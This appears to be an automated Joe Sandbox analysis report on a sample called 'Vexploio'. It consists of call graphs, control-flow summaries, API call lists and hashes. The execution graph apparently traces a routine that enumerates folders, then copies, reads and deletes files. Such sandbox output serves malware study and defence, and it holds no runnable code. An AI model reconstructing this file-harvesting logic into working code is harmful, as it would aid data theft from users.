1133 6f271215 GlobalAlloc 1079->1133 1081 6f2724a4 1082 6f272534 StringFromGUID2 WideCharToMultiByte 1081->1082 1083 6f272523 lstrcpynA 1081->1083 1084 6f272558 WideCharToMultiByte 1081->1084 1085 6f27259d GlobalFree 1081->1085 1086 6f272579 wsprintfA 1081->1086 1087 6f2725d7 GlobalFree 1081->1087 1088 6f271266 2 API calls 1081->1088 1134 6f2712d1 1081->1134 1082->1081 1083->1081 1084->1081 1085->1081 1086->1081 1087->998 1088->1081 1138 6f271215 GlobalAlloc 1090->1138 1092 6f27155e 1093 6f27156b 2 API calls 1092->1093 1094 6f271568 1093->1094 1095 6f271266 1094->1095 1096 6f27126f GlobalAlloc lstrcpynA 1095->1096 1097 6f2712a8 GlobalFree 1095->1097 1096->1097 1097->1004 1099 6f2715a4 lstrcpyA 1098->1099 1100 6f271577 wsprintfA 1098->1100 1103 6f2715bd 1099->1103 1100->1103 1103->1007 1105 6f27246c 1104->1105 1107 6f2717ef 1104->1107 1106 6f272485 GlobalFree 1105->1106 1105->1107 1106->1105 1107->1015 1107->1016 1109 6f271266 2 API calls 1108->1109 1110 6f271503 1109->1110 1110->1009 1111->1020 1112->1027 1114 6f271552 1113->1114 1114->1027 1121 6f271215 GlobalAlloc 1115->1121 1117 6f271233 lstrcpynA 1117->1041 1118->1049 1119->1038 1120->1041 1121->1117 1123 6f2712b4 1122->1123 1124 6f271224 2 API calls 1123->1124 1125 6f2712cf 1124->1125 1125->1051 1127 6f272614 VirtualAlloc 1126->1127 1128 6f27266a 1126->1128 1127->1128 1128->1057 1130 6f2729af 1129->1130 1131 6f2729b4 GetLastError 1130->1131 1132 6f2729bf 1130->1132 1131->1132 1132->1064 1133->1081 1135 6f2712da 1134->1135 1136 6f2712f9 1134->1136 1135->1136 1137 6f2712e0 lstrcpyA 1135->1137 1136->1081 1137->1136 1138->1092 1182 6f27221a 1183 6f272284 1182->1183 1184 6f27228f GlobalAlloc 1183->1184 1185 6f2722ae 1183->1185 1184->1183 1186 6f271638 1187 6f271667 1186->1187 1188 6f271a98 18 API calls 1187->1188 1189 6f27166e 1188->1189 1190 6f271675 1189->1190 1191 6f271681 1189->1191 1192 6f271266 2 API calls 1190->1192 1193 6f27168b 1191->1193 1194 6f2716a8 1191->1194 1197 6f27167f 1192->1197 1198 6f2714e2 3 API calls 1193->1198 1195 6f2716d2 1194->1195 1196 6f2716ae 1194->1196 1201 6f2714e2 3 API calls 1195->1201 1200 6f271559 3 API calls 1196->1200 1199 6f271690 1198->1199 1202 6f271559 3 API calls 1199->1202 1203 6f2716b3 1200->1203 1201->1197 1204 6f271696 1202->1204 1205 6f271266 2 API calls 1203->1205 1206 6f271266 2 API calls 1204->1206 1207 6f2716b9 GlobalFree 1205->1207 1208 6f27169c GlobalFree 1206->1208 1207->1197 1209 6f2716cd GlobalFree 1207->1209 1208->1197 1209->1197 1210 6f271058 1213 6f271074 1210->1213 1211 6f2710dc 1212 6f271091 1215 6f2714bb GlobalFree 1212->1215 1213->1211 1213->1212 1214 6f2714bb GlobalFree 1213->1214 1214->1212 1216 6f2710a1 1215->1216 1217 6f2710b1 1216->1217 1218 6f2710a8 GlobalSize 1216->1218 1219 6f2710c6 1217->1219 1220 6f2710b5 GlobalAlloc 1217->1220 1218->1217 1222 6f2710d1 GlobalFree 1219->1222 1221 6f2714e2 3 API calls 1220->1221 1221->1219 1222->1211

                              Callgraph

                              • Executed
                              • Not Executed
                              • Opacity -> Relevance
                              • Disassembly available
                              callgraph 0 Function_6F2729A4 39 Function_6F2729E0 0->39 41 Function_6F2729EE 0->41 1 Function_6F271224 28 Function_6F271215 1->28 2 Function_6F272BA3 9 Function_6F271534 2->9 18 Function_6F272984 2->18 22 Function_6F272980 2->22 25 Function_6F27298C 2->25 27 Function_6F272988 2->27 33 Function_6F272998 2->33 35 Function_6F272965 2->35 43 Function_6F27296B 2->43 44 Function_6F272976 2->44 48 Function_6F27297C 2->48 57 Function_6F27295F 2->57 3 Function_6F272F20 4 Function_6F2712AD 4->1 5 Function_6F271429 46 Function_6F272DF0 5->46 51 Function_6F272D40 5->51 6 Function_6F272937 7 Function_6F271837 7->5 11 Function_6F272EB0 7->11 15 Function_6F27123B 7->15 21 Function_6F272D00 7->21 23 Function_6F272F00 7->23 34 Function_6F271266 7->34 7->46 47 Function_6F2712FE 7->47 7->51 56 Function_6F272ED0 7->56 8 Function_6F271A36 8->47 26 Function_6F271508 9->26 10 Function_6F2722B1 10->1 10->4 10->5 10->15 17 Function_6F272606 10->17 10->47 12 Function_6F27103D 29 Function_6F27101B 12->29 13 Function_6F27293D 14 Function_6F2714BB 14->15 14->47 16 Function_6F271638 31 Function_6F271A98 16->31 16->34 36 Function_6F2714E2 16->36 60 Function_6F271559 16->60 19 Function_6F272C83 19->18 19->27 19->35 19->44 52 Function_6F27294B 19->52 20 Function_6F271000 20->29 24 Function_6F27288C 29->14 29->36 30 Function_6F27221A 31->1 31->5 31->8 31->9 31->15 31->28 31->47 50 Function_6F2715C2 31->50 32 Function_6F272498 32->5 32->28 32->34 54 Function_6F2712D1 32->54 36->34 37 Function_6F2728E1 38 Function_6F2710E0 38->4 38->15 38->26 38->34 38->54 40 Function_6F27226F 42 Function_6F27156B 45 Function_6F272672 45->24 45->26 47->21 47->47 49 Function_6F2729F8 49->0 49->3 49->6 49->13 49->18 49->22 49->27 49->43 49->44 49->48 49->52 49->57 61 Function_6F272959 49->61 53 Function_6F271556 55 Function_6F2715D1 55->14 58 Function_6F27245E 59 Function_6F2716DB 59->10 59->19 59->31 59->32 59->34 59->36 59->40 59->42 59->45 59->49 59->58 59->60 60->28 60->42 62 Function_6F271058 62->14 62->15 62->26 62->36 62->47

                              Control-flow Graph

                              APIs
                                • Part of subcall function 6F271A98: GlobalFree.KERNEL32(?), ref: 6F271CE7
                                • Part of subcall function 6F271A98: GlobalFree.KERNEL32(?), ref: 6F271CEC
                                • Part of subcall function 6F271A98: GlobalFree.KERNEL32(?), ref: 6F271CF1
                              • GlobalFree.KERNEL32(00000000), ref: 6F271786
                              • FreeLibrary.KERNEL32(?), ref: 6F271809
                              • GlobalFree.KERNEL32(00000000), ref: 6F27182E
                                • Part of subcall function 6F27226F: GlobalAlloc.KERNEL32(00000040,?), ref: 6F2722A0
                                • Part of subcall function 6F272672: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6F271757,00000000), ref: 6F272742
                                • Part of subcall function 6F27156B: wsprintfA.USER32 ref: 6F271599
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.178557255349.000000006F271000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F270000, based on PE: true
                              • Associated: 00000006.00000002.178557154658.000000006F270000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.178557323524.000000006F273000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.178557359260.000000006F275000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6f270000_Vexploio.jbxd
                              Similarity
                              • API ID: Global$Free$Alloc$Librarywsprintf
                              • String ID:
                              • API String ID: 3962662361-3916222277
                              • Opcode ID: 00ccf79410a2dd8bdda8c3325466202510bc4316fb84646bdb39d0bab7ebb49e
                              • Instruction ID: dd77f07910cfe27743087ad8073529c520d47c3ea825e15dcefd75e6258c01ba
                              • Opcode Fuzzy Hash: 00ccf79410a2dd8bdda8c3325466202510bc4316fb84646bdb39d0bab7ebb49e
                              • Instruction Fuzzy Hash: 85418EB110031E9BDB249F7489E4BDA77E8BF05329F048126E955AE8C2DF74A485CFA1

                              Control-flow Graph

                              APIs
                              • EnumWindows.USER32(00000000), ref: 6F272AB7
                              Memory Dump Source
                              • Source File: 00000006.00000002.178557255349.000000006F271000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F270000, based on PE: true
                              • Associated: 00000006.00000002.178557154658.000000006F270000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.178557323524.000000006F273000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.178557359260.000000006F275000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6f270000_Vexploio.jbxd
                              Similarity
                              • API ID: EnumWindows
                              • String ID:
                              • API String ID: 1129996299-0
                              • Opcode ID: 60d73b5fc171df2c13dfc9a778c2f10c424cc197e54278cddb9e1bae417dca9b
                              • Instruction ID: 1ff7df7d0b77097702905db8455f997abfdbd31a09a3b2e69fe1eeb418677697
                              • Opcode Fuzzy Hash: 60d73b5fc171df2c13dfc9a778c2f10c424cc197e54278cddb9e1bae417dca9b
                              • Instruction Fuzzy Hash: 2D418EB2904719DFDB389FA8D999B5937B4FB06329F24842AE404CBAD0DB34B451CF91

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 122 6f2728e1-6f2728ef 123 6f272931-6f272934 122->123 124 6f2728f1-6f27292c VirtualProtect 122->124 124->123
                              APIs
                              • VirtualProtect.KERNELBASE(6F27404C,00000004,00000040,6F27403C), ref: 6F2728FF
                              Memory Dump Source
                              • Source File: 00000006.00000002.178557255349.000000006F271000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F270000, based on PE: true
                              • Associated: 00000006.00000002.178557154658.000000006F270000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.178557323524.000000006F273000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.178557359260.000000006F275000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6f270000_Vexploio.jbxd
                              Similarity
                              • API ID: ProtectVirtual
                              • String ID:
                              • API String ID: 544645111-0
                              • Opcode ID: 41c64c448ef747ce3620eb62653ba848204d60768d57f30a91b57cfd7f142eef
                              • Instruction ID: d62b8e1081e5f9dc7f0a40351bdebd4ef5e34dc419bb404a905dd74712bc68b4
                              • Opcode Fuzzy Hash: 41c64c448ef747ce3620eb62653ba848204d60768d57f30a91b57cfd7f142eef
                              • Instruction Fuzzy Hash: 2DF0A5B1508AA0DECB68CF6C8448B057FE0B71B365B51452EE158D7A41E7747064CF11

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 338 6f272498-6f27249e 339 6f27249f call 6f271215 338->339 340 6f2724a4-6f2724c2 339->340 341 6f2724c4-6f2724c9 340->341 342 6f2724cf 341->342 343 6f2724cb-6f2724cd 341->343 344 6f2724d1-6f2724d8 342->344 343->344 345 6f2724de 344->345 346 6f272588-6f27258d 344->346 347 6f272577 345->347 348 6f272516-6f272521 call 6f271429 345->348 349 6f2724e5-6f2724e7 345->349 350 6f272534-6f272556 StringFromGUID2 WideCharToMultiByte 345->350 351 6f272523-6f272532 lstrcpynA 345->351 352 6f2724ec-6f2724f0 345->352 353 6f272558-6f272575 WideCharToMultiByte 345->353 354 6f2725a4-6f2725a9 346->354 355 6f27258f-6f272596 346->355 363 6f272579-6f27257f wsprintfA 347->363 368 6f272585 348->368 349->346 350->346 351->346 358 6f272513-6f272514 352->358 359 6f2724f2-6f27250c 352->359 353->346 360 6f2725c6-6f2725d1 354->360 361 6f2725ab-6f2725ae 354->361 356 6f27259d-6f27259e GlobalFree 355->356 357 6f272598-6f27259b 355->357 356->354 357->354 357->356 358->363 359->358 360->341 367 6f2725d7-6f2725e5 GlobalFree 360->367 364 6f2725b0 361->364 365 6f2725b8-6f2725ba 361->365 363->368 369 6f2725b1 call 6f271266 364->369 365->360 370 6f2725bc-6f2725c4 call 6f2712d1 365->370 368->346 371 6f2725b6 369->371 373 6f2725c5 370->373 371->373 373->360
                              APIs
                                • Part of subcall function 6F271215: GlobalAlloc.KERNEL32(00000040,6F271233,?,6F2712CF,-6F27404B,6F2711AB,-000000A0), ref: 6F27121D
                              • GlobalFree.KERNEL32(?), ref: 6F27259E
                              • GlobalFree.KERNEL32(00000000), ref: 6F2725D8
                              Memory Dump Source
                              • Source File: 00000006.00000002.178557255349.000000006F271000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F270000, based on PE: true
                              • Associated: 00000006.00000002.178557154658.000000006F270000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.178557323524.000000006F273000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.178557359260.000000006F275000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6f270000_Vexploio.jbxd
                              Similarity
                              • API ID: Global$Free$Alloc
                              • String ID:
                              • API String ID: 1780285237-0
                              • Opcode ID: e5ebb09b4d357d7f001d9df9335e6ebb3dd0eb5413c4b605752fd423991bce92
                              • Instruction ID: 7b422f19db00279d59c86f8a18093a97b9acea2bfb5ddc6eea2def384771754d
                              • Opcode Fuzzy Hash: e5ebb09b4d357d7f001d9df9335e6ebb3dd0eb5413c4b605752fd423991bce92
                              • Instruction Fuzzy Hash: C741C3B150862AEFC7288F64CDA9C2A77FAFF86315B00462DF54097580CB31AD54CF61

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 375 6f2722b1-6f2722c6 376 6f2722ca-6f2722e1 375->376 377 6f2722e3-6f2722e8 376->377 378 6f27230d-6f272312 call 6f271224 376->378 377->378 379 6f2722ea-6f2722ed 377->379 383 6f272317 378->383 381 6f2722f6-6f2722f8 379->381 382 6f2722ef-6f2722f4 call 6f27123b 379->382 385 6f2722fa-6f2722fd 381->385 386 6f272308-6f27230b 381->386 387 6f272318-6f272321 382->387 383->387 385->386 389 6f2722ff-6f272306 call 6f2712ad 385->389 386->387 390 6f272327 387->390 391 6f272323-6f272325 387->391 389->383 392 6f272329-6f272337 390->392 391->392 394 6f272406-6f272412 GlobalFree 392->394 395 6f27233d 392->395 404 6f272437-6f27243d 394->404 405 6f272414-6f272422 394->405 397 6f272366-6f27236c call 6f271224 395->397 398 6f272344-6f272347 395->398 399 6f272354-6f272361 call 6f2712fe 395->399 400 6f2723e4-6f272403 call 6f271429 395->400 401 6f2723cd-6f2723d0 395->401 402 6f27234c-6f272352 call 6f2712fe 395->402 403 6f272378-6f2723a2 GlobalAlloc MultiByteToWideChar 395->403 421 6f27236f-6f272373 397->421 398->394 399->394 400->394 401->394 406 6f2723d2-6f2723e2 call 6f2712fe call 6f272606 401->406 402->421 413 6f2723c5-6f2723cb 403->413 414 6f2723a4-6f2723c3 GlobalAlloc CLSIDFromString GlobalFree 403->414 411 6f272424-6f272429 405->411 412 6f27242e-6f272432 405->412 406->394 411->376 412->376 413->394 414->394 421->394
                              APIs
                              • GlobalFree.KERNEL32(00000000), ref: 6F272407
                                • Part of subcall function 6F271224: lstrcpynA.KERNEL32(00000000,?,6F2712CF,-6F27404B,6F2711AB,-000000A0), ref: 6F271234
                              • GlobalAlloc.KERNEL32(00000040,?), ref: 6F272382
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 6F272397
                              • GlobalAlloc.KERNEL32(00000040,00000010), ref: 6F2723A8
                              • CLSIDFromString.OLE32(00000000,00000000), ref: 6F2723B6
                              • GlobalFree.KERNEL32(00000000), ref: 6F2723BD
                              Memory Dump Source
                              • Source File: 00000006.00000002.178557255349.000000006F271000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F270000, based on PE: true
                              • Associated: 00000006.00000002.178557154658.000000006F270000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.178557323524.000000006F273000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.178557359260.000000006F275000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6f270000_Vexploio.jbxd
                              Similarity
                              • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                              • String ID:
                              • API String ID: 3730416702-0
                              • Opcode ID: 85726ddde3f598cdfdda24bec4dfc84a79b96f80b18cf9c6ce8c797534935adf
                              • Instruction ID: c053668eea439be8d15ec3bea494af4ccb2d0a3a1391810dc4bd28cdbedac989
                              • Opcode Fuzzy Hash: 85726ddde3f598cdfdda24bec4dfc84a79b96f80b18cf9c6ce8c797534935adf
                              • Instruction Fuzzy Hash: 094178B1608729EFD7348F299944E6AB7E8FF42321F00495EE446DA9C0DF34A985CF61

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 424 6f2710e0-6f271126 call 6f27123b 428 6f2711c4-6f2711d0 GlobalFree 424->428 429 6f27112c 424->429 430 6f27112d-6f271134 429->430 431 6f271203-6f271206 430->431 432 6f27113a 430->432 435 6f27119e-6f2711ac call 6f2712ad call 6f271266 431->435 436 6f271208-6f27120a 431->436 433 6f2711d1-6f2711d8 432->433 434 6f271140-6f271143 432->434 439 6f2711ba-6f2711bd 433->439 440 6f2711da-6f271201 call 6f271508 GlobalFree 433->440 434->433 438 6f271149-6f27114c 434->438 455 6f2711b1-6f2711b4 GlobalFree 435->455 441 6f271186-6f271199 call 6f27123b call 6f2712d1 436->441 442 6f271210 436->442 444 6f27114e-6f271150 438->444 445 6f27119b 438->445 439->430 446 6f2711c3 439->446 440->439 441->455 449 6f271152-6f271153 442->449 444->449 451 6f271183 444->451 445->435 446->428 449->439 452 6f271155-6f271181 GlobalAlloc call 6f271508 449->452 451->441 452->439 455->439
                              APIs
                              • GlobalAlloc.KERNEL32(00000040,?), ref: 6F27115B
                              • GlobalFree.KERNEL32(00000000), ref: 6F2711B4
                              • GlobalFree.KERNEL32(?), ref: 6F2711C7
                              • GlobalFree.KERNEL32(?), ref: 6F2711F5
                              Memory Dump Source
                              • Source File: 00000006.00000002.178557255349.000000006F271000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F270000, based on PE: true
                              • Associated: 00000006.00000002.178557154658.000000006F270000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.178557323524.000000006F273000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.178557359260.000000006F275000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6f270000_Vexploio.jbxd
                              Similarity
                              • API ID: Global$Free$Alloc
                              • String ID:
                              • API String ID: 1780285237-0
                              • Opcode ID: 00cc5d078862fdda0d619f34a2b0875e0e3107d53a69ba618d72ba2d81bf5f13
                              • Instruction ID: 252322e65f6d3ac5bd91be7a122a0ca4064bbf4361e697f8e6823af2142f664b
                              • Opcode Fuzzy Hash: 00cc5d078862fdda0d619f34a2b0875e0e3107d53a69ba618d72ba2d81bf5f13
                              • Instruction Fuzzy Hash: FB31C4B1508669DFEB258F78D96DE657FF8FF06265B04011AE844CA950DF34E890CF20

                              Execution Graph

                              Execution Coverage:2.7%
                              Dynamic/Decrypted Code Coverage:100%
                              Signature Coverage:1.3%
                              Total number of Nodes:1662
                              Total number of Limit Nodes:5
                              execution_graph 6061 351e281c 6064 351e2882 6061->6064 6067 351e3550 6064->6067 6066 351e282a 6068 351e355d 6067->6068 6071 351e358a 6067->6071 6069 351e47e5 21 API calls 6068->6069 6068->6071 6070 351e357a 6069->6070 6070->6071 6073 351e544d 6070->6073 6071->6066 6074 351e545a 6073->6074 6075 351e5468 6073->6075 6074->6075 6080 351e547f 6074->6080 6076 351e6368 20 API calls 6075->6076 6077 351e5470 6076->6077 6082 351e62ac 6077->6082 6079 351e547a 6079->6071 6080->6079 6081 351e6368 20 API calls 6080->6081 6081->6077 6085 351e6231 6082->6085 6084 351e62b8 6084->6079 6086 351e5b7a 20 API calls 6085->6086 6087 351e6247 6086->6087 6088 351e62a6 6087->6088 6089 351e6255 6087->6089 6096 351e62bc IsProcessorFeaturePresent 6088->6096 6093 351e2ada 5 API calls 6089->6093 6091 351e62ab 6092 351e6231 26 API calls 6091->6092 6094 351e62b8 6092->6094 6095 351e627c 6093->6095 6094->6084 6095->6084 6097 351e62c7 6096->6097 6100 351e60e2 6097->6100 6101 351e60fe 6100->6101 6102 351e612a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6101->6102 6103 351e61fb 6102->6103 6104 351e2ada 5 API calls 6103->6104 6105 351e6219 GetCurrentProcess TerminateProcess 6104->6105 6105->6091 7522 351e4bdd 7523 351e4bec 7522->7523 7524 351e4c08 7522->7524 7523->7524 7526 351e4bf2 7523->7526 7525 351e6d60 51 API calls 7524->7525 7527 351e4c0f GetModuleFileNameA 7525->7527 7528 351e6368 20 API calls 7526->7528 7529 351e4c33 7527->7529 7530 351e4bf7 7528->7530 7545 351e4d01 7529->7545 7531 351e62ac 26 API calls 7530->7531 7542 351e4c01 7531->7542 7536 351e4c66 7538 351e6368 20 API calls 7536->7538 7537 351e4c72 7539 351e4d01 38 API calls 7537->7539 7544 351e4c6b 7538->7544 7540 351e4c88 7539->7540 7543 351e571e 20 API calls 7540->7543 7540->7544 7541 351e571e 20 API calls 7541->7542 7543->7544 7544->7541 7547 351e4d26 7545->7547 7549 351e4d86 7547->7549 7557 351e70eb 7547->7557 7548 351e4c50 7551 351e4e76 7548->7551 7549->7548 7550 351e70eb 38 API calls 7549->7550 7550->7549 7552 351e4e8b 7551->7552 7553 351e4c5d 7551->7553 7552->7553 7554 351e637b 20 API calls 7552->7554 7553->7536 7553->7537 7555 351e4eb9 7554->7555 7556 351e571e 20 API calls 7555->7556 7556->7553 7560 351e7092 7557->7560 7561 351e54a7 38 API calls 7560->7561 7562 351e70a6 7561->7562 7562->7547 7243 351e4a9a 7246 351e5411 7243->7246 7247 351e541d 7246->7247 7248 351e5af6 38 API calls 7247->7248 7249 351e5422 7248->7249 7250 351e55a8 38 API calls 7249->7250 7251 351e544c 7250->7251 5803 351e1c5b 5804 351e1c6b 5803->5804 5807 351e12ee 5804->5807 5806 351e1c87 5808 351e1324 5807->5808 5809 351e13b7 GetEnvironmentVariableW 5808->5809 5833 351e10f1 5809->5833 5812 351e10f1 57 API calls 5813 351e1465 5812->5813 5814 351e10f1 57 API calls 5813->5814 5815 351e1479 5814->5815 5816 351e10f1 57 API calls 5815->5816 5817 351e148d 5816->5817 5818 351e10f1 57 API calls 5817->5818 5819 351e14a1 5818->5819 5820 351e10f1 57 API calls 5819->5820 5821 351e14b5 lstrlenW 5820->5821 5822 351e14d9 lstrlenW 5821->5822 5823 351e14d2 5821->5823 5824 351e10f1 57 API calls 5822->5824 5823->5806 5825 351e1501 lstrlenW lstrcatW 5824->5825 5826 351e10f1 57 API calls 5825->5826 5827 351e1539 lstrlenW lstrcatW 5826->5827 5828 351e10f1 57 API calls 5827->5828 5829 351e156b lstrlenW lstrcatW 5828->5829 5830 351e10f1 57 API calls 5829->5830 5831 351e159d lstrlenW lstrcatW 5830->5831 5832 351e10f1 57 API calls 5831->5832 5832->5823 5834 351e1118 5833->5834 5835 351e1129 lstrlenW 5834->5835 5846 351e2c40 5835->5846 5838 351e1168 lstrlenW 5839 351e1177 lstrlenW FindFirstFileW 5838->5839 5840 351e11a0 5839->5840 5841 351e11e1 5839->5841 5842 351e11aa 5840->5842 5843 351e11c7 FindNextFileW 5840->5843 5841->5812 5842->5843 5848 351e1000 5842->5848 5843->5840 5844 351e11da FindClose 5843->5844 5844->5841 5847 351e1148 lstrcatW lstrlenW 5846->5847 5847->5838 5847->5839 5849 351e1022 5848->5849 5850 351e10af 5849->5850 5851 351e102f lstrcatW lstrlenW 5849->5851 5852 351e10b5 lstrlenW 5850->5852 5863 351e10ad 5850->5863 5853 351e105a lstrlenW 5851->5853 5854 351e106b lstrlenW 5851->5854 5879 351e1e16 5852->5879 5853->5854 5865 351e1e89 lstrlenW 5854->5865 5857 351e10ca 5859 351e1e89 5 API calls 5857->5859 5857->5863 5858 351e1088 GetFileAttributesW 5860 351e109c 5858->5860 5858->5863 5861 351e10df 5859->5861 5860->5863 5871 351e173a 5860->5871 5884 351e11ea 5861->5884 5863->5842 5866 351e2c40 5865->5866 5867 351e1ea7 lstrcatW lstrlenW 5866->5867 5868 351e1ec2 5867->5868 5869 351e1ed1 lstrcatW 5867->5869 5868->5869 5870 351e1ec7 lstrlenW 5868->5870 5869->5858 5870->5869 5872 351e1747 5871->5872 5899 351e1cca 5872->5899 5875 351e199f 5875->5863 5877 351e1824 5877->5875 5919 351e15da 5877->5919 5880 351e1e29 5879->5880 5883 351e1e4c 5879->5883 5881 351e1e2d lstrlenW 5880->5881 5880->5883 5882 351e1e3f lstrlenW 5881->5882 5881->5883 5882->5883 5883->5857 5885 351e120e 5884->5885 5886 351e1e89 5 API calls 5885->5886 5887 351e1220 GetFileAttributesW 5886->5887 5888 351e1246 5887->5888 5890 351e1235 5887->5890 5889 351e1e89 5 API calls 5888->5889 5891 351e1258 5889->5891 5890->5888 5892 351e173a 35 API calls 5890->5892 5893 351e10f1 56 API calls 5891->5893 5892->5888 5894 351e126d 5893->5894 5895 351e1e89 5 API calls 5894->5895 5896 351e127f 5895->5896 5897 351e10f1 56 API calls 5896->5897 5898 351e12e6 5897->5898 5898->5863 5900 351e1cf1 5899->5900 5901 351e1d0f CopyFileW CreateFileW 5900->5901 5902 351e1d44 DeleteFileW 5901->5902 5903 351e1d55 GetFileSize 5901->5903 5908 351e1808 5902->5908 5904 351e1ede 22 API calls 5903->5904 5905 351e1d66 ReadFile 5904->5905 5906 351e1d7d CloseHandle DeleteFileW 5905->5906 5907 351e1d94 CloseHandle DeleteFileW 5905->5907 5906->5908 5907->5908 5908->5875 5909 351e1ede 5908->5909 5911 351e222f 5909->5911 5912 351e224e 5911->5912 5915 351e2250 5911->5915 5927 351e474f 5911->5927 5932 351e47e5 5911->5932 5912->5877 5914 351e2908 5916 351e35d2 RaiseException 5914->5916 5915->5914 5939 351e35d2 5915->5939 5918 351e2925 5916->5918 5918->5877 5920 351e160c 5919->5920 5921 351e163c lstrlenW 5920->5921 6027 351e1c9d 5921->6027 5923 351e1655 lstrcatW lstrlenW 5924 351e1678 5923->5924 5925 351e167e lstrcatW 5924->5925 5926 351e1693 5924->5926 5925->5926 5926->5877 5942 351e4793 5927->5942 5930 351e478f 5930->5911 5931 351e4765 5948 351e2ada 5931->5948 5934 351e56d0 5932->5934 5933 351e570e 5961 351e6368 5933->5961 5934->5933 5935 351e56f9 RtlAllocateHeap 5934->5935 5938 351e474f 7 API calls 5934->5938 5935->5934 5937 351e570c 5935->5937 5937->5911 5938->5934 5940 351e35f2 RaiseException 5939->5940 5940->5914 5943 351e479f 5942->5943 5955 351e5671 RtlEnterCriticalSection 5943->5955 5945 351e47aa 5956 351e47dc 5945->5956 5947 351e47d1 5947->5931 5949 351e2ae5 IsProcessorFeaturePresent 5948->5949 5950 351e2ae3 5948->5950 5952 351e2b58 5949->5952 5950->5930 5960 351e2b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 5952->5960 5954 351e2c3b 5954->5930 5955->5945 5959 351e56b9 RtlLeaveCriticalSection 5956->5959 5958 351e47e3 5958->5947 5959->5958 5960->5954 5964 351e5b7a GetLastError 5961->5964 5965 351e5b99 5964->5965 5966 351e5b93 5964->5966 5970 351e5bf0 SetLastError 5965->5970 5990 351e637b 5965->5990 5983 351e5e08 5966->5983 5972 351e5bf9 5970->5972 5971 351e5bb3 5997 351e571e 5971->5997 5972->5937 5976 351e5bcf 6010 351e593c 5976->6010 5977 351e5bb9 5979 351e5be7 SetLastError 5977->5979 5979->5972 5981 351e571e 17 API calls 5982 351e5be0 5981->5982 5982->5970 5982->5979 6015 351e5c45 5983->6015 5985 351e5e2f 5986 351e5e47 TlsGetValue 5985->5986 5987 351e5e3b 5985->5987 5986->5987 5988 351e2ada 5 API calls 5987->5988 5989 351e5e58 5988->5989 5989->5965 5996 351e6388 5990->5996 5991 351e63c8 5993 351e6368 19 API calls 5991->5993 5992 351e63b3 RtlAllocateHeap 5994 351e5bab 5992->5994 5992->5996 5993->5994 5994->5971 6003 351e5e5e 5994->6003 5995 351e474f 7 API calls 5995->5996 5996->5991 5996->5992 5996->5995 5998 351e5729 HeapFree 5997->5998 5999 351e5752 5997->5999 5998->5999 6000 351e573e 5998->6000 5999->5977 6001 351e6368 18 API calls 6000->6001 6002 351e5744 GetLastError 6001->6002 6002->5999 6004 351e5c45 5 API calls 6003->6004 6005 351e5e85 6004->6005 6006 351e5ea0 TlsSetValue 6005->6006 6007 351e5e94 6005->6007 6006->6007 6008 351e2ada 5 API calls 6007->6008 6009 351e5bc8 6008->6009 6009->5971 6009->5976 6021 351e5914 6010->6021 6016 351e5c75 6015->6016 6017 351e5c71 6015->6017 6016->5985 6017->6016 6018 351e5ce1 LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 6017->6018 6020 351e5c95 6017->6020 6018->6017 6019 351e5ca1 GetProcAddress 6019->6016 6020->6016 6020->6019 6022 351e5854 RtlEnterCriticalSection RtlLeaveCriticalSection 6021->6022 6023 351e5938 6022->6023 6024 351e58c4 6023->6024 6025 351e5758 20 API calls 6024->6025 6026 351e58e8 6025->6026 6026->5981 6028 351e1ca6 6027->6028 6028->5923 7563 351e4ed7 7564 351e6d60 51 API calls 7563->7564 7565 351e4ee9 7564->7565 7574 351e7153 GetEnvironmentStringsW 7565->7574 7569 351e571e 20 API calls 7570 351e4f29 7569->7570 7571 351e4eff 7572 351e571e 20 API calls 7571->7572 7573 351e4ef4 7572->7573 7573->7569 7575 351e716a 7574->7575 7585 351e71bd 7574->7585 7576 351e7170 WideCharToMultiByte 7575->7576 7579 351e718c 7576->7579 7576->7585 7577 351e4eee 7577->7573 7586 